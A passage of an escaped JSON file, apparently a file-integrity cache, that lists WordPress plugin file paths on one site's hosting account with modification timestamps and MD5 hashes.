assets\\/js\\/flatpickr.min.js\":{\"d\":1545638193,\"h\":\"ee75ba2365a7d1759bc3e07e4deafa4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/chart.min.js\":{\"d\":1545638193,\"h\":\"f6c8efa65711e0cbbc99ba72997ecd0e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.insert-at-caret.min.js\":{\"d\":1545638193,\"h\":\"2995e0e742a67bf9fc80fcb333c1ecf0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.minicolors.min.js\":{\"d\":1545638193,\"h\":\"f04b7fe5987fad6f82a71a3a4f2dce51\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin.min.js\":{\"d\":1545638193,\"h\":\"19f7a21a9f7c817ae83840aa375b05ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/fonts\\/fontawesome-webfont.woff\":{\"d\":1545638193,\"h\":\"fee66e712a8a08eef5805a46892932ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/fonts\\/fontawesome-webfont.eot\":{\"d\":1545638193,\"h\":\"674f50d287a8c48dc19ba404d20fe713\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/fonts\\/fontawesome-webfont.ttf\":{\"d\":1545638193,\"h\":\"b06871f281fee6b241d60582ae9369b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/fonts\\/fontawesome-webfont.woff2\":{\"d\":1545638193,\"h\":\"af7ae505a9eed503f8b8e6982036873e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/languages\\/wpforms-lite.pot\":{\"d\":1545638197,\"h\":\"8c8e96186e58f9e10f0c48cee277ac98\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/overview\\/class-overview.php\":{\"d\":1545638197,\"h\":\"b03a230e5587d2d7e332aeb07256b59e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/overview\\/class-overview-table.php\":{\"d\":1545638197,\"h\":\"1c4eb2061f87c3ea5fb26cd81fae0737\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/interface.php\":{\"d\":1545638197,\"h\":\"e852446e6000246acf7e52870fe503a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/class-base.php\":{\"d\":1545638197,\"h\":\"e3a3a67f40478bcc4b74cfea63ee9c52\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/class-contact-form-7.php\":{\"d\":1545638197,\"h\":\"d9359756daccbab237b23b14007e088f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/class-install-silent-skin.php\":{\"d\":1545638197,\"h\":\"d0e4bb45594b216f84f8ca68ea0b546e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/class-pirate-forms.php\":{\"d\":1545638197,\"h\":\"2b676552570d32e27cecb64f1fdb2b0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/importers\\/class-ninja-forms.php\":{\"d\":1545638197,\"h\":\"17039fa6a8fc1e033449cafd1eb6dee0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-settings.php\":{\"d\":1545638197,\"h\":\"a4c9c4e8ad0566d2bd557eccf5f381d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-fields.php\":{\"d\":1545638197,\"h\":\"5f0cdfe82d6c913384b18cc97519369b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-providers.php\":{\"d\":1545638197,\"h\":\"d2b76fa1aa0e3ba21e27c0bd07bfbdee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-base.php\":{\"d\":1545638197,\"h\":\"10841905acdf3d1d673a0325362ff2e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-analytics.php\":{\"d\":1545638197,\"h\":\"6fa177e391c69c53589d808bb0ff72a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-payments.php\":{\"d\":1545638197,\"h\":\"50ca62fc837dd86c49ef3e312bf246f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-setup.php\":{\"d\":1545638197,\"h\":\"371578b43cec95f20d5ed936042ebd9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/functions.php\":{\"d\":1545638197,\"h\":\"44a439f8b8873e9a23bceb949a1373bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/class-builder.php\":{\"d\":1545638197,\"h\":\"a699f4a81f64f57f2bf3e0d88933773f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-editor.php\":{\"d\":1545638197,\"h\":\"daf96f35869691c1cf15560e61db07e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/ajax-actions.php\":{\"d\":1545638197,\"h\":\"12aa2656f58c59d250f4ed9ab9f57400\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-am-deactivation-survey.php\":{\"d\":1545638197,\"h\":\"98dbd9d7b6f280a843408dc5ea900270\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-welcome.php\":{\"d\":1545638197,\"h\":\"aa75811b413bf8b086d90579091420ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-importers.php\":{\"d\":1545638197,\"h\":\"95101e5e7f504d906605558adcfe85ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-settings.php\":{\"d\":1545638197,\"h\":\"1b45ccac8b45d6ba29e2e4e69bbe1c63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/admin.php\":{\"d\":1545638197,\"h\":\"b38c43e2f43002cd405153840762d98a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-am-notification.php\":{\"d\":1545638197,\"h\":\"51f95f6eae4650317d41499a78f1dcf9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-about.php\":{\"d\":1545638197,\"h\":\"89501f907ea571837fc6e65e290b3979\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-tools.php\":{\"d\":1545638197,\"h\":\"409aa70e21b573e09557d6f3ee99c76a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-install-skin.php\":{\"d\":1545638197,\"h\":\"3174227e68a7e296f0947f19e85c461d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/settings-api.php\":{\"d\":1545638197,\"h\":\"a6782875b0aa82f3372a6a37c9c8c824\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-review.php\":{\"d\":1545638197,\"h\":\"6864760ea1bacff30906b7baed88a093\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-menu.php\":{\"d\":1545638197,\"h\":\"6fe5f440e03cf61d3ec1b347c339ad23\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-notices.php\":{\"d\":1545638197,\"h\":\"ebc30541519784062dbd35ac7b70ce4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/class-am-dashboard-widget-extend-feed.php\":{\"d\":1545638197,\"h\":\"c3412a5bc9a2e9173b5dfdfbe2fa2697\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/templates\\/field-default.php\":{\"d\":1545638197,\"h\":\"6be3f2aeb08440869a90e5a45eb0cc35\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/templates\\/default.php\":{\"d\":1545638197,\"h\":\"3b521da97fb6c8f601322aa6d3315262\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/templates\\/header-default.php\":{\"d\":1545638197,\"h\":\"e592e4bc57cad186e45ac72791fa8283\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/templates\\/body-default.php\":{\"d\":1545638197,\"h\":\"d030aec6d9a1429c5242aa8e5cb16e6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/templates\\/footer-default.php\":{\"d\":1545638197,\"h\":\"5ea8be5c9c8ff0c2bcda84243979ba24\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/emails\\/class-emails.php\":{\"d\":1545638197,\"h\":\"d03c2c34cd71eb7c2983a2f0321efbd3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-number.php\":{\"d\":1545638197,\"h\":\"7694164798a4a87ff7ccb6ee2ee0c398\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-text.php\":{\"d\":1545638197,\"h\":\"dc6740b65ec5a850d9a4e9942892e143\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-checkbox.php\":{\"d\":1545638197,\"h\":\"1bbfb6be869c6ae5f558a2de2aa0f6cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-base.php\":{\"d\":1545638197,\"h\":\"4ba63cf206c933735ea2e851cd8b31a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-textarea.php\":{\"d\":1545638197,\"h\":\"3cd9aec36103de1679482a9a1ec6a284\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-select.php\":{\"d\":1545638197,\"h\":\"d32a888a801900fb9aab3d15df5baf42\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-email.php\":{\"d\":1545638197,\"h\":\"06bf3c039474fb1ef52b5c63b3bc016f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-gdpr-checkbox.php\":{\"d\":1545638197,\"h\":\"019f29aa1aca9679bcb6813309d0a404\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-radio.php\":{\"d\":1545638197,\"h\":\"ffe8cd9c78c99901b4df13a952bb8928\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/fields\\/class-name.php\":{\"d\":1545638197,\"h\":\"946d1dbeee571379a2f5c58aa4dbee45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/analytics\\/class-base.php\":{\"d\":1545638197,\"h\":\"583965e71509a9551e2f78301d08cce1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/analytics\\/class-monster-insights.php\":{\"d\":1545638197,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/providers\\/class-base.php\":{\"d\":1545638197,\"h\":\"5ea2d3753032bfe70ff95b4ed1affb08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/providers\\/class-constant-contact.php\":{\"d\":1545638197,\"h\":\"068a06a7038c34f2a53734a882c08a29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/templates\\/class-suggestion.php\":{\"d\":1545638197,\"h\":\"8aa5c93594b4ee6c1f46d843e62a7f63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/templates\\/class-base.php\":{\"d\":1545638197,\"h\":\"5140ff9f77633f8b95e5e3d99b57667d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/templates\\/class-subscribe.php\":{\"d\":1545638197,\"h\":\"a0f28c27a379698f227d6f0b19478428\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/templates\\/class-contact.php\":{\"d\":1545638197,\"h\":\"70392e526e0ad501356d84ec638d6f9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/templates\\/class-blank.php\":{\"d\":1545638197,\"h\":\"074900cb3089ef87ab1b9983ce32c17f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-templates.php\":{\"d\":1545638197,\"h\":\"4b214b3b2dfeaaf6d4ab2ea8bb38d446\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-smart-tags.php\":{\"d\":1545638197,\"h\":\"98b5cb0e13d38a853d4c653f280f62ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/integrations.php\":{\"d\":1545638197,\"h\":\"0a5091cb0dd1b46a41e3564f3d16b705\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-frontend.php\":{\"d\":1545638197,\"h\":\"1d5d5a35f86ad5d10b2aa4590e5b3ee8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-process.php\":{\"d\":1545638197,\"h\":\"9775c8a8412c4418b16265f2a0f6527a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-fields.php\":{\"d\":1545638197,\"h\":\"b09f77a9d4f9401f8bc737cb0dc2c315\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-providers.php\":{\"d\":1545638197,\"h\":\"2a1ffbe845d32c7c07a7e0ff06448390\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-install.php\":{\"d\":1545638197,\"h\":\"287e5e4cfec6f884fce79a8a64d555ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/functions.php\":{\"d\":1545638197,\"h\":\"910f267a9461ccd850fdbd2d1dc9e75c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-logging.php\":{\"d\":1545638197,\"h\":\"74c69861c517ee02c44ee8a6f992d79e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-preview.php\":{\"d\":1545638197,\"h\":\"c5075079c6838aa5d4f01ab62c1f6352\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-widget.php\":{\"d\":1545638197,\"h\":\"458f0b6c8e979771ffd84a8e94a11b99\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-form.php\":{\"d\":1545638197,\"h\":\"d587eca5b12bdb883b0344af27ff265b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/class-conditional-logic-core.php\":{\"d\":1545638197,\"h\":\"e1f42adf3ea5f8e0d29bd0e10a2c25f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Lite\\/Admin\\/DashboardWidget.php\":{\"d\":1545638197,\"h\":\"2a075ef1743fc4ed11b19db50c475c21\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Providers\\/Provider\\/Settings\\/PageIntegrations.php\":{\"d\":1545638197,\"h\":\"84c7d48ebb3c462e94fb15ad94e96489\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Providers\\/Provider\\/Settings\\/PageIntegrationsInterface.php\":{\"d\":1545638197,\"h\":\"2ddde515cd55c9e4e84e4938a6a51493\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Providers\\/Provider\\/Settings\\/FormBuilderInterface.php\":{\"d\":1545638197,\"h\":\"5d13d85df33a4b22ba22c5b4a54c4bde\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Providers\\/Provider\\/Settings\\/FormBuilder.php\":{\"d\":1545638197,\"h\":\"aabe0327bf995fcfd635968410450c1d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Providers\\/Provider\\/Status.php\":{\"d\":1545638197,\"h\":\"c599231ea10771578c6cf473db704d4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Providers\\/Provider\\/Process.php\":{\"d\":1545638197,\"h\":\"960f08195fe560e3c3f6bbfe574562f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Providers\\/Provider\\/Core.php\":{\"d\":1545638197,\"h\":\"7be1780c0ca947101e79e88f85cf7e0c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Providers\\/Loader.php\":{\"d\":1545638197,\"h\":\"e1a0c59743fff4e6a8ab22fb7e52e010\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Integrations\\/WPMailSMTP\\/Notifications.php\":{\"d\":1545638197,\"h\":\"05cc0d0659370420584f8b882de80b24\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Integrations\\/Gutenberg\\/FormSelector.php\":{\"d\":1545638197,\"h\":\"797759844c38b9c295c13ea86b39cb03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Integrations\\/Loader.php\":{\"d\":1545638197,\"h\":\"1492e797360f66f1b4cfd80fecf465e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Integrations\\/IntegrationInterface.php\":{\"d\":1545638197,\"h\":\"bf7a00a12f08e98492d671a3ec4d51f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Admin\\/Loader.php\":{\"d\":1545638197,\"h\":\"c5d21ba8148fd7b65e15f5d8276906d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/Admin\\/Challenge.php\":{\"d\":1545638197,\"h\":\"20cb3724df3a7e06c1f39b6d6c1328cd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/src\\/WPForms.php\":{\"d\":1545638197,\"h\":\"454e46dcead227cfdccf8681e380bda2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin\\/dashboard-widget.min.js\":{\"d\":1545638197,\"h\":\"5d7775a09926d9a982bf8979810bbd80\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin\\/dashboard-widget.js\":{\"d\":1545638197,\"h\":\"d7cfb7db7759833134e9438728c9d187\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/assets\\/js\\/admin-builder-lite.js\":{\"d\":1545638197,\"h\":\"c5e7a92a3793fa2a75cc86562be2ca16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/lite\\/wpforms-lite.php\":{\"d\":1545638197,\"h\":\"ad978907bdc2acf333e564847c10e039\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/uninstall.php\":{\"d\":1545638193,\"h\":\"46ac91b354631b2dc891e776ffe00d56\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/wpforms.php\":{\"d\":1545638193,\"h\":\"2672e641976a9a3652ba4cc8a4a84eb9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/changelog.txt\":{\"d\":1545638197,\"h\":\"6854dcb8724589505944deb3766fbf7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/autoloader.php\":{\"d\":1545638197,\"h\":\"f81b2846950a674ba3d40167e69922c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/readme.txt\":{\"d\":1545638197,\"h\":\"251704b2183324d93ad81d09536bc6e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/classic-editor\\/js\\/block-editor-plugin.js\":{\"d\":1544491215,\"h\":\"5f04ffda898c29af0972ea6d99e2ac77\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/classic-editor\\/LICENSE.md\":{\"d\":1544491215,\"h\":\"d2242a9dd766ce933c757c8e6234654f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/classic-editor\\/classic-editor.php\":{\"d\":1544491215,\"h\":\"8066b510935ce9368b2fa299e7bab4ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/classic-editor\\/readme.txt\":{\"d\":1544491215,\"h\":\"107d6ef06b6a2098e00176f7fda876b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/hover\\/hover.css\":{\"d\":1545638471,\"h\":\"cc1cba097ab4eacbabb0e99f72bf81c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/hover\\/hover.min.css\":{\"d\":1545638471,\"h\":\"e1fb58015d32aa818790dbed4cedc1f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/animate.css\\/animate.css\":{\"d\":1545638471,\"h\":\"f86ea6941cf680339fd3473b4b45e3d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/animate.css\\/animate.min.css\":{\"d\":1545638471,\"h\":\"f05a10f01367534f52b70d792d17b2d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/animate.css\\/animate-config.json\":{\"d\":1545638471,\"h\":\"3acee434d15c977d2123b274ea81d3a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/slick\\/slick.min.js\":{\"d\":1545638471,\"h\":\"d5a61c749e44e47159af8a6579dda121\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/slick\\/slick.js\":{\"d\":1545638471,\"h\":\"053e15844b6b9e0e967160b83a8f5847\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/animations\\/animations.min.css\":{\"d\":1545638471,\"h\":\"4601ba55044413706c2022cb6c1c3d05\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/backbone\\/backbone.radio.min.js\":{\"d\":1545638471,\"h\":\"6b08d64e754847c1c3119c37b698da08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/backbone\\/backbone.marionette.min.js\":{\"d\":1545638471,\"h\":\"5ac86476a4e7203b39e323906215767f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/backbone\\/backbone.marionette.js\":{\"d\":1545638471,\"h\":\"a4b175a2844d618d3db8f543279892b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/backbone\\/backbone.radio.js\":{\"d\":1545638471,\"h\":\"5b57e2e8a76b67ea4100f5e1b3a83518\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/perfect-scrollbar\\/perfect-scrollbar.jquery.min.js\":{\"d\":1545638471,\"h\":\"f592548ece14addeebbc8d6643bc3350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/perfect-scrollbar\\/perfect-scrollbar.min.js\":{\"d\":1545638471,\"h\":\"34754f85c6d63b6b2df5b8116059584e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/perfect-scrollbar\\/perfect-scrollbar.jquery.js\":{\"d\":1545638471,\"h\":\"a798f90103f43ab3c512c213545bc4a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/assets\\/lib\\/perfect-scrollbar\\/perfect-scrollbar.js\":{\"d\":154563